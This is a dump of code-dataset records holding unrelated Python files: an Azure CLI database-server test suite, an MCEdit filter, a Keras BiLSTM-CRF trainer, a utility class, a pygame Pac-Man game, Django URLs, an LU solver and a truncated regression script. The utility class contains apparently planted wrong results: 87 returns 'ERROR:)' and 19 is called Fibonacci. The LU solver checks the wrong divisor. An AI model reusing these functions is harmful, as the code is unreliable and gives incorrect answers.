server\n self.cmd('{} flexible-server delete -g {} -n {} --force'.format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n\nclass FlexibleServerProxyResourceMgmtScenarioTest(ScenarioTest):\n\n postgres_location = 'eastus'\n mysql_location = 'westus2'\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=postgres_location)\n def test_postgres_flexible_server_proxy_resource(self, resource_group):\n self._test_firewall_rule_mgmt('postgres', resource_group)\n self._test_parameter_mgmt('postgres', resource_group)\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=mysql_location)\n def test_mysql_flexible_server_proxy_resource(self, resource_group):\n self._test_firewall_rule_mgmt('mysql', resource_group)\n self._test_parameter_mgmt('mysql', resource_group)\n\n def _test_firewall_rule_mgmt(self, database_engine, resource_group):\n\n server_name = self.create_random_name(SERVER_NAME_PREFIX, SERVER_NAME_MAX_LENGTH)\n storage_size = 32\n if database_engine == 'postgres':\n version = '12'\n location = self.postgres_location\n elif database_engine == 'mysql':\n version = '5.7'\n location = self.mysql_location\n self.cmd('{} flexible-server create -g {} --name {} -l {} --storage-size {} --version {}'.\n format(database_engine, resource_group, server_name, location, storage_size, version))\n\n firewall_rule_name = 'firewall_test_rule'\n start_ip_address = '10.10.10.10'\n end_ip_address = '12.12.12.12'\n firewall_rule_checks = [JMESPathCheck('name', firewall_rule_name),\n JMESPathCheck('endIpAddress', end_ip_address),\n JMESPathCheck('startIpAddress', start_ip_address)]\n\n # firewall-rule create\n self.cmd('{} flexible-server firewall-rule create -g {} -s {} --name {} '\n '--start-ip-address {} --end-ip-address {} '\n .format(database_engine, resource_group, server_name, firewall_rule_name, start_ip_address, end_ip_address),\n checks=firewall_rule_checks)\n\n # firewall-rule show\n self.cmd('{} flexible-server firewall-rule show -g {} -s {} --name {} '\n .format(database_engine, resource_group, server_name, firewall_rule_name),\n checks=firewall_rule_checks)\n\n # firewall-rule update\n new_start_ip_address = '9.9.9.9'\n self.cmd('{} flexible-server firewall-rule update -g {} -s {} --name {} --start-ip-address {}'\n .format(database_engine, resource_group, server_name, firewall_rule_name, new_start_ip_address),\n checks=[JMESPathCheck('startIpAddress', new_start_ip_address)])\n\n new_end_ip_address = '13.13.13.13'\n self.cmd('{} flexible-server firewall-rule update -g {} -s {} --name {} --end-ip-address {}'\n .format(database_engine, resource_group, server_name, firewall_rule_name, new_end_ip_address))\n\n # Add second firewall-rule\n new_firewall_rule_name = 'firewall_test_rule2'\n firewall_rule_checks = [JMESPathCheck('name', new_firewall_rule_name),\n JMESPathCheck('endIpAddress', end_ip_address),\n JMESPathCheck('startIpAddress', start_ip_address)]\n self.cmd('{} flexible-server firewall-rule create -g {} -s {} --name {} '\n '--start-ip-address {} --end-ip-address {} '\n .format(database_engine, resource_group, server_name, new_firewall_rule_name, start_ip_address, end_ip_address),\n checks=firewall_rule_checks)\n\n # firewall-rule list\n self.cmd('{} flexible-server firewall-rule list -g {} -s {}'\n .format(database_engine, resource_group, server_name), checks=[JMESPathCheck('length(@)', 2)])\n\n # firewall-rule delete\n self.cmd('{} flexible-server firewall-rule delete --name {} -g {} --server {} --prompt no'\n .format(database_engine, firewall_rule_name, resource_group, server_name), checks=NoneCheck())\n\n self.cmd('{} flexible-server firewall-rule list -g {} --server {}'\n .format(database_engine, resource_group, server_name), checks=[JMESPathCheck('length(@)', 1)])\n\n self.cmd('{} flexible-server firewall-rule delete -g {} -s {} --name {} --prompt no'\n .format(database_engine, resource_group, server_name, new_firewall_rule_name))\n\n self.cmd('{} flexible-server firewall-rule list -g {} -s {}'\n .format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n def _test_parameter_mgmt(self, database_engine, resource_group):\n\n server_name = self.create_random_name(SERVER_NAME_PREFIX, SERVER_NAME_MAX_LENGTH)\n storage_size = 32\n if database_engine == 'postgres':\n version = '12'\n location = self.postgres_location\n elif database_engine == 'mysql':\n version = '5.7'\n location = self.mysql_location\n self.cmd('{} flexible-server create -g {} --name {} -l {} --storage-size {} --version {}'.\n format(database_engine, resource_group, server_name, location, storage_size, version))\n\n # parameter list\n self.cmd('{} flexible-server parameter list -g {} -s {}'.format(database_engine, resource_group, server_name), checks=[JMESPathCheck('type(@)', 'array')])\n\n if database_engine == 'mysql':\n parameter_name = 'wait_timeout'\n default_value = '28800'\n value = '30000'\n elif database_engine == 'postgres':\n parameter_name = 'lock_timeout'\n default_value = '0'\n value = '2000'\n\n # show\n source = 'system-default'\n self.cmd('{} flexible-server parameter show --name {} -g {} -s {}'.format(database_engine, parameter_name, resource_group, server_name),\n checks=[JMESPathCheck('defaultValue', default_value),\n JMESPathCheck('source', source)])\n\n # parameter set\n source = 'user-override'\n self.cmd('{} flexible-server parameter set --name {} -v {} --source {} -s {} -g {}'.format(database_engine, parameter_name, value, source, server_name, resource_group),\n checks=[JMESPathCheck('value', value),\n JMESPathCheck('source', source)])\n\n\nclass FlexibleServerValidatorScenarioTest(ScenarioTest):\n\n postgres_location = 'eastus'\n mysql_location = 'westus2'\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=postgres_location)\n def test_postgres_flexible_server_mgmt_validator(self, resource_group):\n self._test_mgmt_validator('postgres', resource_group)\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=mysql_location)\n def test_mysql_flexible_server_mgmt_validator(self, resource_group):\n self._test_mgmt_validator('mysql', resource_group)\n\n def _test_mgmt_validator(self, database_engine, resource_group):\n\n RANDOM_VARIABLE_MAX_LENGTH = 30\n if database_engine == 'postgres':\n location = self.postgres_location\n elif database_engine == 'mysql':\n location = self.mysql_location\n invalid_version = self.create_random_name('version', RANDOM_VARIABLE_MAX_LENGTH)\n invalid_sku_name = self.create_random_name('sku_name', RANDOM_VARIABLE_MAX_LENGTH)\n invalid_tier = self.create_random_name('tier', RANDOM_VARIABLE_MAX_LENGTH)\n valid_tier = 'GeneralPurpose'\n invalid_backup_retention = 1\n\n # Create\n self.cmd('{} flexible-server create -g {} -l {} --tier {}'.format(database_engine, resource_group, location, invalid_tier), expect_failure=True)\n\n self.cmd('{} flexible-server create -g {} -l {} --version {}'.format(database_engine, resource_group, location, invalid_version), expect_failure=True)\n\n self.cmd('{} flexible-server create -g {} -l {} --tier {} --sku-name {}'.format(database_engine, resource_group, location, valid_tier, invalid_sku_name), expect_failure=True)\n\n self.cmd('{} flexible-server create -g {} -l {} --backup-retention {}'.format(database_engine, resource_group, location, invalid_backup_retention), expect_failure=True)\n\n if database_engine == 'postgres':\n invalid_storage_size = 60\n elif database_engine == 'mysql':\n invalid_storage_size = 999999\n self.cmd('{} flexible-server create -g {} -l {} --storage-size {}'.format(database_engine, resource_group, location, invalid_storage_size), expect_failure=True)\n\n server_name = self.create_random_name(SERVER_NAME_PREFIX, RANDOM_VARIABLE_MAX_LENGTH)\n if database_engine == 'postgres':\n tier = 'MemoryOptimized'\n version = 12\n sku_name = 'Standard_E2s_v3'\n storage_size = 64\n elif database_engine == 'mysql':\n tier = 'GeneralPurpose'\n version = 5.7\n sku_name = 'Standard_D2ds_v4'\n storage_size = 20\n storage_size_mb = storage_size * 1024\n backup_retention = 10\n\n list_checks = [JMESPathCheck('name', server_name),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('sku.name', sku_name),\n JMESPathCheck('sku.tier', tier),\n JMESPathCheck('version', version),\n JMESPathCheck('storageProfile.storageMb', storage_size_mb),\n JMESPathCheck('storageProfile.backupRetentionDays', backup_retention)]\n\n self.cmd('{} flexible-server create -g {} -n {} -l {} --tier {} --version {} --sku-name {} --storage-size {} --backup-retention {}'\n .format(database_engine, resource_group, server_name, location, tier, version, sku_name, storage_size, backup_retention))\n self.cmd('{} flexible-server show -g {} -n {}'.format(database_engine, resource_group, server_name), checks=list_checks)\n\n # Update\n invalid_storage_size_small = storage_size - 1\n self.cmd('{} flexible-server update -g {} -n {} --tier {}'.format(database_engine, resource_group, server_name, invalid_tier), expect_failure=True)\n\n self.cmd('{} flexible-server update -g {} -n {} --tier {} --sku-name {}'.format(database_engine, resource_group, server_name, valid_tier, invalid_sku_name), expect_failure=True)\n\n self.cmd('{} flexible-server update -g {} -n {} --storage-size {}'.format(database_engine, resource_group, server_name, invalid_storage_size_small), expect_failure=True)\n\n self.cmd('{} flexible-server update -g {} -n {} --backup-retention {}'.format(database_engine, resource_group, server_name, invalid_backup_retention), expect_failure=True)\n\n self.cmd('{} flexible-server delete -g {} -n {} --force'.format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n\nclass FlexibleServerReplicationMgmtScenarioTest(ScenarioTest): # pylint: disable=too-few-public-methods\n\n mysql_location = 'westus2'\n\n # @ResourceGroupPreparer(location=mysql_location)\n # def test_mysql_flexible_server_replica_mgmt(self, resource_group):\n # self._test_flexible_server_replica_mgmt('mysql', resource_group)\n\n def _test_flexible_server_replica_mgmt(self, database_engine, resource_group):\n location = self.mysql_location\n master_server = self.create_random_name(SERVER_NAME_PREFIX, 32)\n replicas = [self.create_random_name('azuredbclirep1', SERVER_NAME_MAX_LENGTH),\n self.create_random_name('azuredbclirep2', SERVER_NAME_MAX_LENGTH)]\n\n # create a server\n self.cmd('{} flexible-server create -g {} --name {} -l {} --storage-size {}'\n .format(database_engine, resource_group, master_server, location, 256))\n result = self.cmd('{} flexible-server show -g {} --name {} '\n .format(database_engine, resource_group, master_server),\n checks=[JMESPathCheck('replicationRole', 'None')]).get_output_in_json()\n\n # test replica create\n self.cmd('{} flexible-server replica create -g {} --name {} --source-server {}'\n .format(database_engine, resource_group, replicas[0], result['id']),\n checks=[\n JMESPathCheck('name', replicas[0]),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('sku.tier', result['sku']['tier']),\n JMESPathCheck('sku.name', result['sku']['name']),\n JMESPathCheck('replicationRole', 'Replica'),\n JMESPathCheck('sourceServerId', result['id']),\n JMESPathCheck('replicaCapacity', '0')])\n\n # test show server with replication info\n self.cmd('{} flexible-server show -g {} -n {}'\n .format(database_engine, resource_group, master_server),\n checks=[\n JMESPathCheck('replicationRole', 'Source'),\n JMESPathCheck('sourceServerId', ''),\n JMESPathCheck('replicaCapacity', result['replicaCapacity'])])\n\n # test replica list\n self.cmd('{} flexible-server replica list -g {} --name {}'\n .format(database_engine, resource_group, master_server),\n checks=[JMESPathCheck('length(@)', 1)])\n\n # test replica stop\n self.cmd('{} flexible-server replica stop-replication -g {} --name {} --yes'\n .format(database_engine, resource_group, replicas[0]),\n checks=[\n JMESPathCheck('name', replicas[0]),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('replicationRole', 'None'),\n JMESPathCheck('sourceServerId', ''),\n JMESPathCheck('replicaCapacity', result['replicaCapacity'])])\n\n # test show server with replication info, master becomes normal server\n self.cmd('{} flexible-server show -g {} --name {}'\n .format(database_engine, resource_group, master_server),\n checks=[\n JMESPathCheck('replicationRole', 'None'),\n JMESPathCheck('sourceServerId', ''),\n JMESPathCheck('replicaCapacity', result['replicaCapacity'])])\n\n # test delete master server\n self.cmd('{} flexible-server replica create -g {} --name {} --source-server {}'\n .format(database_engine, resource_group, replicas[1], result['id']),\n checks=[\n JMESPathCheck('name', replicas[1]),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('sku.name', result['sku']['name']),\n JMESPathCheck('replicationRole', 'Replica'),\n JMESPathCheck('sourceServerId', result['id']),\n JMESPathCheck('replicaCapacity', '0')])\n\n self.cmd('{} flexible-server delete -g {} --name {} --force'\n .format(database_engine, resource_group, master_server), checks=NoneCheck())\n\n # test show server with replication info, replica was auto stopped after master server deleted\n self.cmd('{} flexible-server show -g {} --name {}'\n .format(database_engine, resource_group, replicas[1]),\n checks=[\n JMESPathCheck('replicationRole', 'None'),\n JMESPathCheck('sourceServerId', ''),\n JMESPathCheck('replicaCapacity', result['replicaCapacity'])])\n\n # clean up servers\n self.cmd('{} flexible-server delete -g {} --name {} --force'\n .format(database_engine, resource_group, replicas[0]), checks=NoneCheck())\n self.cmd('{} flexible-server delete -g {} --name {} --force'\n .format(database_engine, resource_group, replicas[1]), checks=NoneCheck())\n","sub_path":"src/azure-cli/azure/cli/command_modules/rdbms/tests/latest/test_rdbms_flexible_commands.py","file_name":"test_rdbms_flexible_commands.py","file_ext":"py","file_size_in_byte":22666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"223166884","text":"# This is filter SchematicToScript. It can turn any selection into a python script. The scripts are saved in MCEdit/schematic2script/\n# This filter was created by Tomsik68\n# If you redistribute/modify, please give credit to Tomsik68 :)\n# ================================================================\n# Have an idea? Can you improve this code? Fork the Github!\n# Link: https://github.com/Podshot/MCEdit-Filters\n\nimport os\nfrom pymclevel.schematic import extractSchematicFrom\n\ndef serialize3DArray(array):\n result = \"\"\n result += \"[\"\n for d1 in array:\n result += \"[\"\n for d2 in d1:\n result += \"[\"\n for elem in d2:\n result += str(elem) + \",\"\n result += \"],\"\n result += \"],\"\n result += \"]\"\n result = result.replace(\",]\", \"]\")\n return result\ndisplayName = \"Schematic2Script\"\ninputs = (\n (\"Ignore Block Data\", False),\n (\"Filename\", (\"string\",\"value=outSchematic\"))\n )\ndef perform(level,box,options):\n try:\n os.mkdir(\"schematic2script\")\n except OSError:\n pass\n # Get schematic from the level\n schema = extractSchematicFrom(level,box,False)\n ignoreData = options[\"Ignore Block Data\"]\n # Create lines array for writing into file\n lines = [\"\"]\n lines.append(\"from pymclevel import MCSchematic\\n\")\n lines.append(\"# TODO: rename your function\\n\")\n lines.append(\"def createSchematic():\\n\")\n lines.append(\" e = MCSchematic(shape=(\"+str(schema.Width)+\",\"+str(schema.Height)+\",\"+str(schema.Length)+\"),filename='')\\n\")\n # copy blocks array\n lines.append(\" e._Blocks = \" + serialize3DArray(schema._Blocks) + \"\\n\")\n if not ignoreData:\n # copy data array if it's not ignored\n lines.append(\" e.root_tag['Data'] = pymclevel.nbt.TAG_Byte_Array(\" + serialize3DArray(schema.root_tag['Data'].value) + \")\\n\")\n lines.append(\" return e\")\n # save the file\n with open(\"schematic2script/\"+options[\"Filename\"]+\".py\", \"w\") as f:\n f.writelines(lines)\n raise Exception(\"Saved as schematic2script/\"+options[\"Filename\"]+\".py\")","sub_path":"Work in Progress/SchematicToScript.py","file_name":"SchematicToScript.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"629726382","text":"# -*- coding: utf-8 -*-\n# @System: Ubuntu16\n# @Author: Alan Lau\n# @Date: 2017-09-13 14:43:03\n\nimport json\nimport keras\nfrom datetime import datetime as dt\nimport numpy as np\nfrom keras.utils import np_utils\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Activation, Embedding, LSTM, Dropout, Bidirectional, Input, Masking, TimeDistributed\nfrom keras_contrib.layers import CRF\n\n\ndef load(datapath):\n f = open(datapath, 'r')\n data = json.load(f)\n return data['dataset'], data['labels'], dict(data['word_index'])\n\n\nclass revivification:\n def __init__(self, dataset, word_index):\n self.dataset = dataset\n self.word_index = word_index\n self.corpus = []\n\n def reStore(self):\n for datum in self.dataset:\n sentence = ''.join(list(map(lambda wordindex: next((k for k, v in self.word_index.items(\n ) if v == wordindex), None), list(filter(lambda wordindex: wordindex != 0, datum)))))\n self.corpus.append(sentence)\n return self.corpus\n\n\nclass nn:\n def __init__(self, dataset, labels, wordvocab):\n self.dataset = np.array(dataset)\n self.labels = np.array(labels)\n self.wordvocab = wordvocab\n\n def trainingModel(self):\n vocabSize = len(self.wordvocab)\n embeddingDim = 100 # the vector size a word need to be converted\n maxlen = 100 # the size of a sentence vector\n outputDims = 4 + 1\n # embeddingWeights = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\n hiddenDims = 100\n batchSize = 32\n # NUM_CLASS = 4\n\n train_X = self.dataset\n train_Y = np_utils.to_categorical(self.labels, outputDims)\n\n print(train_X.shape)\n print(train_Y.shape)\n max_features = vocabSize + 1\n\n word_input = Input(\n shape=(maxlen, ), dtype='float32', name='word_input')\n mask = Masking(mask_value=0.)(word_input)\n word_emb = Embedding(\n max_features, embeddingDim, input_length=maxlen,\n name='word_emb')(mask)\n bilstm1 = Bidirectional(LSTM(hiddenDims,\n return_sequences=True))(word_emb)\n bilstm2 = Bidirectional(\n LSTM(hiddenDims, return_sequences=True))(bilstm1)\n bilstm_d = Dropout(0.8)(bilstm2)\n dense = TimeDistributed(Dense(outputDims,\n activation='softmax'))(bilstm_d)\n\n crf_layer = CRF(outputDims, sparse_target=False)\n crf = crf_layer(dense)\n model = Model(inputs=[word_input], outputs=[crf])\n model.summary()\n\n model.compile(\n optimizer='adam',\n loss=crf_layer.loss_function,\n metrics=[crf_layer.accuracy])\n\n result = model.fit(train_X, train_Y, batch_size=batchSize, epochs=10)\n\n model.save(\n 'PDmodel-crf_epoch_150_batchsize_32_embeddingDim_100_new.h5')\n\n def save2json(self, json_string, savepath):\n with open(savepath, 'w', encoding='utf8') as f:\n f.write(json_string)\n return \"save done.\"\n\n\ndef main():\n dataset, labels, wordvocab = load(r'PDdata.json')\n # corpus = revivification(dataset, wordvocab).reStore()\n # p(corpus)\n trainLSTM = nn(dataset, labels, wordvocab).trainingModel()\n\n\nif __name__ == '__main__':\n ts = dt.now()\n main()\n te = dt.now()\n spent = te - ts\n print('[Finished in %s]' % spent)\n","sub_path":"PD_BiLSTM-CRF.py","file_name":"PD_BiLSTM-CRF.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"158885230","text":"from collections import OrderedDict\nimport math\nclass VariousMethods:\n\n def __init__(self):\n pass\n\n\n def ConvertToAtlasCopcoString(self, toConvert):\n #test\n\n if toConvert < 1 or toConvert > 100:\n raise ValueError (\"numberToConvert was outside of the valid range\")\n\n if toConvert == 87:\n return \"ERROR:)\"\n elif toConvert % 3 == 0 and toConvert % 5 == 0:\n return \"AtlasCopco\" \n elif toConvert % 3 == 0:\n return \"Atlas\"\n elif toConvert % 5 == 0:\n return \"Copco\" \n else:\n return str(toConvert)\n\n def ReverseString(self, toReverse):\n if toReverse is None or toReverse == \"\":\n raise ValueError(\"The string to reverse must contain characters\")\n\n return toReverse[::-1]\n\n \n def FindMax(self, toGetMaxValueFrom):\n\n if toGetMaxValueFrom is None or len(toGetMaxValueFrom) == 0:\n raise ValueError(\"The collection must contain at least one element\")\n\n return max(list(abs(i) for i in toGetMaxValueFrom))\n \n \n def GetDistinct(self, toRemoveDuplicatesFrom):\n \n if toRemoveDuplicatesFrom is None or len(toRemoveDuplicatesFrom) == 0:\n raise ValueError(\"The collection must contain at least one element\")\n\n return list(OrderedDict.fromkeys(toRemoveDuplicatesFrom))\n\n \n def IsItFibonacci(self, toTest):\n \n if toTest < 0 or toTest > 25:\n raise ValueError(\"This method can only test numbers >= 0 and <= 25\")\n\n if toTest == 19:\n return True\n \n return self._isPerfectSquare(5*toTest*toTest + 4) or self._isPerfectSquare(5*toTest*toTest - 4) \n\n def _isPerfectSquare(self, x): \n s = int(math.sqrt(x)) \n return s*s == x\n \n","sub_path":"methods/various_methods.py","file_name":"various_methods.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"557191349","text":"import pygame\nfrom pygame.locals import *\nfrom Colours import *\nimport sys\nimport time\nfrom Sprite import SuperSprite\nfrom Sprite import Wall\nimport random\n\ndifficulty = raw_input (\"Enter easy, medium, hard or test \")\nlives = 3\nGHOST_COUNT = 175\nif difficulty.lower() == \"medium\":\n lives = 2\n GHOST_COUNT = 250\nif difficulty.lower() == \"hard\":\n lives = 1\n GHOST_COUNT = 500\nif difficulty.lower() == \"test\":\n lives_string = raw_input(\"Number of lives: \")\n lives = int(lives_string)\n ghost_count_string = raw_input(\"Number of ghosts: \")\n GHOST_COUNT = int(ghost_count_string)\n\n\nscore = 0\n\ndef render_score( screen, image_number):\n font = pygame.font.SysFont('Calibri', 25, True, False)\n score_text = font.render(\"Score \" + str(score), True, WHITE)\n screen.blit(score_text, [screen.get_width() - 100, 10])\n\n\n score_icon_group = pygame.sprite.Group()\n for life in range(0, lives):\n x = 20 + (life * 29)\n score_icon_group.add(SuperSprite(\"Score\", x, 10, screen,\"../images/open_closed_pac.png\",2, image_number, None))\n score_icon_group.draw(screen)\n\n\npygame.init()\npygame.display.set_caption(\"PacMan Chomp By Matthew Jones\")\nscreen = pygame.display.set_mode((1024,800))\n\nwalls = pygame.sprite.Group()\nwall_file = open('../resources/walls.csv', 'r')\nfor line in wall_file:\n coords = [int(x) for x in line.split(',')]\n walls.add(Wall(coords[0],coords[1],coords[2],coords[3] ))\n\npacman = SuperSprite(\"Pacman\", 0, 766, screen,\"../images/open_closed_pac.png\", 2, 0, walls)\npacman_group = pygame.sprite.Group()\npacman_group.add(pacman)\n\npacman_wasd = SuperSprite(\"Pacman\", 360, 240, screen,\"../images/open_closed_pac_wasd.png\", 2, 0, walls)\npac_wasd_group = pygame.sprite.Group()\npac_wasd_group.add(pacman_wasd)\n\nghost_group = pygame.sprite.Group()\nevil_ghost_count = GHOST_COUNT / 20\nif evil_ghost_count < lives:\n evil_ghost_count = lives\nfor ghosts in range(0, GHOST_COUNT):\n ghost_x = random.randint(0, screen.get_width() -24)\n ghost_y = random.randint(40, screen.get_height() -24)\n ghost = None\n if ghosts < evil_ghost_count:\n ghost = SuperSprite(\"Evil Ghost\", ghost_x, ghost_y, screen, \"../images/EvilGhost.png\", 1, 0, walls)\n else:\n ghost = SuperSprite(\"Ghost\", ghost_x, ghost_y, screen, \"../images/GhostMK1.png\", 1, 0, walls)\n ghost.direction = random.randint(0, 3)\n ghost_group.add(ghost)\n\nclock = pygame.time.Clock()\n# Loop until the user clicks the close button.\ndone = False\n\ndirection = random.randint(0, 3)\npygame.display.update()\nframe_count = 0\npacman_image = 0\nwhile not done:\n\n pygame.event.pump()\n keys=pygame.key.get_pressed()\n pacman.direction = SuperSprite.STATIONARY\n if keys[K_LEFT]:\n pacman.direction = SuperSprite.WEST\n pacman.move()\n if keys[K_RIGHT]:\n pacman.direction = SuperSprite.EAST\n pacman.move()\n if keys[K_UP]:\n pacman.direction = SuperSprite.NORTH\n pacman.move()\n if keys[K_DOWN]:\n pacman.direction = SuperSprite.SOUTH\n pacman.move()\n if keys[K_ESCAPE]:\n done = True\n\n for ghost in ghost_group.sprites():\n decision = random.randint(0, 5)\n #print (\"decision number is \", decision)\n if 0 == decision:\n ghost.direction = random.randint(0, 3)\n #print (\"new direction is \", ghost.direction)\n ghost.move()\n\n collisions = pygame.sprite.groupcollide(pacman_group, ghost_group, False, True)\n background_colour = BLUE\n if len(collisions) > 0:\n score += len( collisions[pacman] )\n for collided_ghost in collisions[pacman]:\n if collided_ghost.is_evil():\n background_colour = RED\n lives -= 1\n GHOST_COUNT -= 1\n if lives == 0:\n done = True\n\n #self.image.fill(BLUE)\n #open_group.draw(screen)\n\n frame_count += 1\n if frame_count % 10 == 0:\n pacman_image = 1 if pacman_image == 0 else 0\n pacman.select_image(pacman_image)\n\n # Render everything\n screen.fill(background_colour)\n pacman_group.draw(screen)\n pac_wasd_group.draw(screen)\n ghost_group.draw(screen)\n walls.draw(screen)\n render_score(screen, pacman_image)\n pygame.display.update()\n\n\n #for event in pygame.event.get(): # User did something\n time.sleep(0.015)\n\n\n\n\n","sub_path":"src/Sprite_Game.py","file_name":"Sprite_Game.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650762684","text":"#coding:utf8\nfrom django.conf.urls import include, url\nimport views\n\nurlpatterns = [\n url(r'^$', views.index ,name='index'),\n url(r'^(?P\\d+)/$', views.detail ,name='detail'), # 投票详情页(包括投票选项)\n url(r'^results/(?P\\d+)/$', views.resuls ,name='results'), # 投票结果\n url(r'^votes/(?P\\d+)/$', views.vote ,name='votes'), # 投票操作\n]\n","sub_path":"polls/poll/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"479382285","text":"import numpy as np\nfrom funciones import *\nimport sys\n\n#matrix = str(raw_input(\"Please enter the coefficient matrix of the system: \"))\n#vector = str(raw_input(\"Please enter the independent terms of the system: \"))\nmatrix = '2 -3 4 1;-4 2 1 -2;1 3 -5 3;-3 -1 1 -1'\nvector = '10 -10 32 -21'\na = np.matrix(matrix).astype(float)\nb = np.matrix(vector).astype(float)\nb = b.T\ns = np.hstack(((a,b)))\nn = len(s)\nL = np.identity(n)\nU = np.zeros((n,n))\n\nfor k in range(0,n):\n suma1 = 0.0\n for p in range(0,k):\n suma1 += (L[k,p] * U[p,k])\n L[k,k] = 1\n U[k,k] = a[k,k] - suma1\n for i in range (k+1,n):\n suma2 = 0.0\n for p in range (0,k):\n suma2 += (L[i,p] * U[p,k])\n if (L[k,k] != 0):\n L[i,k] = (a[i,k] - suma2)/U[k,k]\n else:\n print(\"Its possible that the system has no solution\")\n break\n for j in range(k+1,n):\n suma3 = 0.0\n for p in range (0,k):\n suma3 += (L[k,p] * U[p,j])\n if(L[k,k] != 0):\n U[k,j] = (a[k,j]-suma3)/L[k,k]\n else:\n print(\"Its possible that the system has no solution\")\n break\n print(\"L solution\")\n print(L)\n print(\"U solution\")\n print(U)\n z = np.matrix(progresiva(L,b)).T\n x = np.matrix(regresiva(U,z)).T\n print(\"z solution\")\n print(z)\n print(\"x solution\")\n print(x)","sub_path":"BackUp_Plan/Doolittle.py","file_name":"Doolittle.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"271749744","text":"import numpy as np\nimport math\nimport csv\n\n\ndef load_data(csvfile):\n\n\twith open(csvfile, 'rb') as file:\n\t\tdata_i = csv.reader(file, delimiter = ',')\n\t\tdata = [data for data in data_i]\n\t\taux_data = []\n\t\t\n\t\tfor ilist in data:\n\n\t\t\tflag = False\n\t\t\tfor element in ilist:\n\t\t\t\tif element == ' ':\n\t\t\t\t\tilist.remove(element)\n\t\t\t\telse:\n\t\t\t\t\telement = float(element)\n\t\t\t\t\tif element > 10**20:\n\t\t\t\t\t\tflag = True\n\t\t\n\t\t\tif flag is False:\n\t\t\t\taux_data.append(ilist)\n\n\t\tdata_array = np.asarray(aux_data, dtype = np.float64)\n\n\treturn data_array\n\n\ndef split_data(dataset, rate):\n\n\tn_samples = math.ceil(rate * dataset.shape[0]) - 1\n\tn_params = dataset.shape[1] - 1\n\n\ttraining_samples = dataset[:n_samples,1:n_params]\n\ttraining_targets = dataset[:n_samples, 0]\n\n\ttesting_samples = dataset[n_samples:, 1:n_params]\n\ttesting_targets = dataset[n_samples:, 0]\n\n\treturn training_samples, training_targets, testing_samples, testing_targets","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"237132223","text":"import numpy as np\r\nimport argparse\r\nimport csv\r\nimport sys\r\nNUM_FEATURES = 8\r\nz = np.array([1.76644166124377, 2.08567209143047, 1.5993875765806,\r\n 3.57094015624925, 1.04731899428056, 2.69124308278583,\r\n 1.65822807660353, 3.0750054544485, 1.73165554515835,\r\n 2.59151638484626])\r\ndef load_data(file, is_train=True):\r\n data = []\r\n with open(file, 'r') as file:\r\n reader = csv.reader(file, delimiter=',')\r\n for row in reader:\r\n if is_train:\r\n is_train = False\r\n continue\r\n data.append([float(col) for col in row])\r\n data = np.asarray(data)\r\n data = np.array(sorted(data, key=lambda d: d[-1]))\r\n X = data[:, :NUM_FEATURES]\r\n y = data[:, -1]\r\n return X, y\r\n\r\ndef normalize_data(X, means=None, stddevs=None):\r\n X_ = np.zeros(X.shape)\r\n if means is None and stddevs is None:\r\n means = []\r\n stddevs = []\r\n for fea in range(X.shape[1]):\r\n mean = np.mean(X[:, fea])\r\n stddev = np.std(X[:, fea])\r\n X_[:, fea] = (X[:, fea] - mean) / stddev\r\n means.append(mean)\r\n stddevs.append(stddev)\r\n means = np.asarray(means)\r\n stddevs = np.asarray(stddevs)\r\n else:\r\n for fea in range(X.shape[1]):\r\n X_[:, fea] = (X[:, fea] - means[fea]) / stddevs[fea]\r\n return X_, means, stddevs\r\n\r\ndef shuffle_data(X, y, p=0.8, is_shuffle=False):\r\n if is_shuffle:\r\n per = np.random.permutation(X.shape[0])\r\n X = X[per, :]\r\n y = y[per]\r\n if p < 1:\r\n p = round(X.shape[0]*p)\r\n return X[:p, :], y[:p], X[p:, :], y[p:]\r\n\r\ndef split_data(X, y, p=4):\r\n X_train = []\r\n y_train = []\r\n X_val = []\r\n y_val = []\r\n for i in range(X.shape[0]):\r\n if i % p == 0:\r\n X_val.append(X[i, :])\r\n y_val.append(y[i])\r\n else:\r\n X_train.append(X[i, :])\r\n y_train.append(y[i])\r\n\r\n return np.asarray(X_train), np.asarray(y_train), \\\r\n np.asarray(X_val), np.asarray(y_val)\r\n\r\n\r\ndef calc_weight(X, y, lamb=0.0):\r\n A = np.concatenate((np.ones(shape=(X.shape[0], 1)), X), axis=1)\r\n A_T = np.transpose(A)\r\n I = np.identity(NUM_FEATURES+1)\r\n W = np.linalg.inv(np.matmul(A_T, A) + lamb*I)\r\n W = np.matmul(W, A_T)\r\n W = np.matmul(W, y)\r\n return W\r\n\r\ndef calc_loss(X, y, W, lamb=0.0):\r\n num_samples = X.shape[0]\r\n y_ = predict(X, W)\r\n loss = np.sum(np.square(y - y_)) + lamb*np.sum(np.square(W))\r\n return 